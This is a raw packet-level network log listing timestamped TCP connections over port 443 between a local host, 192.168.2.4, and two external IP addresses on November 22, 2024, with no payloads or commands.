Nov 22, 2024 20:35:57.404424906 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.404478073 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.425180912 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.425199032 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.425280094 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.425296068 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.425391912 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.536820889 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.536844969 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.536931992 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.536951065 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.536989927 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.554193974 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.554214001 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.554285049 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.554296970 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.554338932 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.570118904 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.570142031 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.570177078 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.570187092 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.570209980 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.570225000 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.581051111 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.581073046 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.581146002 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.581157923 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.581199884 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.592353106 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.592367887 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.592458963 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.592474937 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.592521906 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.602689981 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.602708101 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.602828026 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.602844954 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.602909088 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.607453108 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.607537985 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.607544899 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.607604027 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.607660055 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.607693911 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.607719898 CET	49761	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.607733965 CET	443	49761	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.656339884 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.656408072 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.656498909 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.657845020 CET	49764	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.657891035 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.657951117 CET	49764	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.658073902 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.658102036 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.659151077 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.659216881 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.659285069 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.659400940 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.659415960 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.659758091 CET	49764	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.659773111 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.660645962 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.660654068 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.660711050 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.660866022 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.660876989 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.661566973 CET	49767	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.661588907 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:57.661653042 CET	49767	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.661753893 CET	49767	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:57.661763906 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:58.903036118 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:58.903116941 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:58.904711962 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:58.904728889 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:58.905057907 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:58.913072109 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:58.959332943 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.264576912 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.265285015 CET	49767	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.265341997 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.265625000 CET	49767	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.265639067 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.377329111 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.377916098 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.377938032 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.378303051 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.378313065 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.509299040 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.509851933 CET	49764	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.509880066 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.510207891 CET	49764	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.510215044 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.511954069 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.512278080 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.512310982 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.512684107 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.512690067 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.533097029 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.533474922 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.533493996 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.533932924 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.533938885 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.625399113 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.625448942 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.625492096 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.625544071 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:59.625613928 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.625650883 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:59.625673056 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:59.661780119 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.661895990 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.662019968 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.662092924 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:59.662092924 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:59.662092924 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:59.662218094 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:59.662260056 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.662286997 CET	49762	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:59.662302971 CET	443	49762	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:59.708411932 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.708489895 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.708550930 CET	49767	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.708797932 CET	49767	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.708797932 CET	49767	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.708823919 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.708838940 CET	443	49767	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.711216927 CET	49768	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.711271048 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.711440086 CET	49768	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.711575031 CET	49768	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.711606979 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.817195892 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.817257881 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.817338943 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.817375898 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.817430019 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.817468882 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.817486048 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.817513943 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.817877054 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.817950964 CET	443	49765	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.818007946 CET	49765	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.819833994 CET	49769	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.819925070 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.820024967 CET	49769	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.820158005 CET	49769	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.820185900 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.962343931 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.962403059 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.962446928 CET	49764	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.962666035 CET	49764	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.962688923 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.962701082 CET	49764	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.962707043 CET	443	49764	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.965393066 CET	49770	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.965445995 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.965523005 CET	49770	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.965708971 CET	49770	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.965738058 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.968333006 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.968353987 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.968415976 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.968447924 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.968503952 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.968573093 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.968611002 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.968647003 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.968806982 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.968842030 CET	443	49763	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.968889952 CET	49763	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.970724106 CET	49771	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.970757008 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.970834017 CET	49771	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.970952034 CET	49771	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.970973015 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.992782116 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.992799044 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.992846012 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.992866993 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.993025064 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.993041992 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.993048906 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.993159056 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.993200064 CET	443	49766	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.993233919 CET	49766	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.995172977 CET	49772	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.995214939 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:35:59.995280981 CET	49772	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.995392084 CET	49772	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:35:59.995409966 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.514303923 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.514950037 CET	49768	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.514986038 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.515404940 CET	49768	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.515412092 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.605537891 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.606031895 CET	49769	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.606100082 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.606411934 CET	49769	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.606429100 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.708937883 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.721301079 CET	49772	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.721323013 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.721810102 CET	49772	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.721820116 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.750638962 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.751100063 CET	49771	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.751146078 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.751540899 CET	49771	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.751553059 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.802463055 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.802850962 CET	49770	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.802880049 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.803292990 CET	49770	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.803302050 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.957585096 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.957743883 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.957818031 CET	49768	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.957912922 CET	49768	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.957937956 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.957953930 CET	49768	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.957959890 CET	443	49768	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.960470915 CET	49773	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.960510015 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:01.960570097 CET	49773	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.960692883 CET	49773	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:01.960706949 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.050832987 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.051022053 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.051093102 CET	49769	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.051158905 CET	49769	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.051158905 CET	49769	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.051198959 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.051223040 CET	443	49769	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.053401947 CET	49774	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.053447962 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.053503990 CET	49774	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.053622961 CET	49774	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.053637028 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.144975901 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.145054102 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.145124912 CET	49772	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.145302057 CET	49772	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.145329952 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.145343065 CET	49772	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.145350933 CET	443	49772	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.147825956 CET	49775	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.147869110 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.147929907 CET	49775	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.148277998 CET	49775	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.148291111 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.238904953 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.238970995 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.239025116 CET	49770	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.239197969 CET	49770	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.239224911 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.239239931 CET	49770	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.239247084 CET	443	49770	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.241632938 CET	49776	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.241688967 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.241786957 CET	49776	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.241909027 CET	49776	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.241920948 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.439558029 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.439727068 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.439806938 CET	49771	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.439870119 CET	49771	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.439897060 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.439910889 CET	49771	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.439918995 CET	443	49771	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.442565918 CET	49777	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.442614079 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:02.442678928 CET	49777	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.442864895 CET	49777	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:02.442887068 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.749974012 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.750837088 CET	49773	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:03.750858068 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.752070904 CET	49773	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:03.752074957 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.846127033 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.846580982 CET	49774	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:03.846606016 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.847017050 CET	49774	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:03.847024918 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.860810995 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.861138105 CET	49776	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:03.861198902 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.861929893 CET	49776	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:03.861943007 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.946021080 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.948193073 CET	49775	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:03.948213100 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:03.948827028 CET	49775	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:03.948832035 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.193329096 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.193470001 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.193541050 CET	49773	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.228528976 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.230824947 CET	49773	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.230842113 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.230853081 CET	49773	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.230858088 CET	443	49773	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.237983942 CET	49777	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.238029957 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.238444090 CET	49777	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.238456964 CET	443	49777	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.243957043 CET	49778	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.244048119 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.244129896 CET	49778	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.244311094 CET	49778	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.244334936 CET	443	49778	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.290169001 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.290311098 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.290369987 CET	49774	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.298310995 CET	49774	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.298340082 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.298353910 CET	49774	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.298362017 CET	443	49774	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.300947905 CET	49779	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.300997019 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.301065922 CET	49779	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.301175117 CET	49779	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.301189899 CET	443	49779	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.312398911 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.312452078 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.312508106 CET	49776	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.312638044 CET	49776	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.312663078 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.312679052 CET	49776	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.312685013 CET	443	49776	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.316601992 CET	49780	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.316616058 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.316683054 CET	49780	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.316791058 CET	49780	443	192.168.2.4	13.107.246.63
Nov 22, 2024 20:36:04.316802025 CET	443	49780	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.391896009 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.391947031 CET	443	49775	13.107.246.63	192.168.2.4
Nov 22, 2024 20:36:04.391988993 CET	49775	443	192.168.2.4	13.107.246.63
